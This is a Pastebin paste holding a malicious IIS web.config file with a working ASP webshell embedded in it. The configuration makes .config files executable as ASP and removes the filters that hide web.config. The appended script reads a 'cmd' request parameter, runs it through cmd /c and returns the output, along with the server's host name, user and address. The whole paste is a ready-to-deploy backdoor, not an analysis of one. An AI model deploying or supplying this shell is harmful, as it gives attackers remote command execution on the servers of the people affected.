SHARE
TWEET

Untitled

a guest Jul 22nd, 2018 66 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version=”1.0″ encoding=”UTF-8″?>
  2. <configuration>
  3.    <system.webServer>
  4.       <handlers accessPolicy=”Read, Script, Write”>
  5.          <add name=”web_config” path=”*.config” verb=”*” modules=”IsapiModule” scriptProcessor=”%windir%\system32\inetsrv\asp.dll” resourceType=”Unspecified” requireAccess=”Write” preCondition=”bitness64″ />
  6.       </handlers>
  7.       <security>
  8.          <requestFiltering>
  9.             <fileExtensions>
  10.                <remove fileExtension=”.config” />
  11.             </fileExtensions>
  12.             <hiddenSegments>
  13.                <remove segment=”web.config” />
  14.             </hiddenSegments>
  15.          </requestFiltering>
  16.       </security>
  17.    </system.webServer>
  18.    <appSettings>
  19. </appSettings>
  20. </configuration>
  21.  
  22. <!--
  23. ASP Webshell
  24. Working on latest IIS
  25. Referance :-
  26. https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
  27. http://stackoverflow.com/questions/11501044/i-need-execute-a-command-line-in-a-visual-basic-script
  28. http://www.w3schools.com/asp/
  29. -->
  30.  
  31.  
  32. <%
  33. Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  34. Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  35. Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
  36. Function getCommandOutput(theCommand)
  37.     Dim objShell, objCmdExec
  38.     Set objShell = CreateObject("WScript.Shell")
  39.     Set objCmdExec = objshell.exec(thecommand)
  40.     getCommandOutput = objCmdExec.StdOut.ReadAll
  41. end Function
  42. %>
  43.  
  44.  
  45. <HTML>
  46. <BODY>
  47. <FORM action="" method="GET">
  48. <input type="text" name="cmd" size=45 value="<%= szCMD %>">
  49. <input type="submit" value="Run">
  50. </FORM>
  51. <PRE>
  52. <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
  53. <%Response.Write(Request.ServerVariables("server_name"))%>
  54. <p>
  55. <b>The server's port:</b>
  56. <%Response.Write(Request.ServerVariables("server_port"))%>
  57. </p>
  58. <p>
  59. <b>The server's software:</b>
  60. <%Response.Write(Request.ServerVariables("server_software"))%>
  61. </p>
  62. <p>
  63. <b>The server's software:</b>
  64. <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
  65. <% szCMD = request("cmd")
  66. thisDir = getCommandOutput("cmd /c" & szCMD)
  67. Response.Write(thisDir)%>
  68. </p>
  69. <br>
  70. </BODY>
  71. </HTML>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top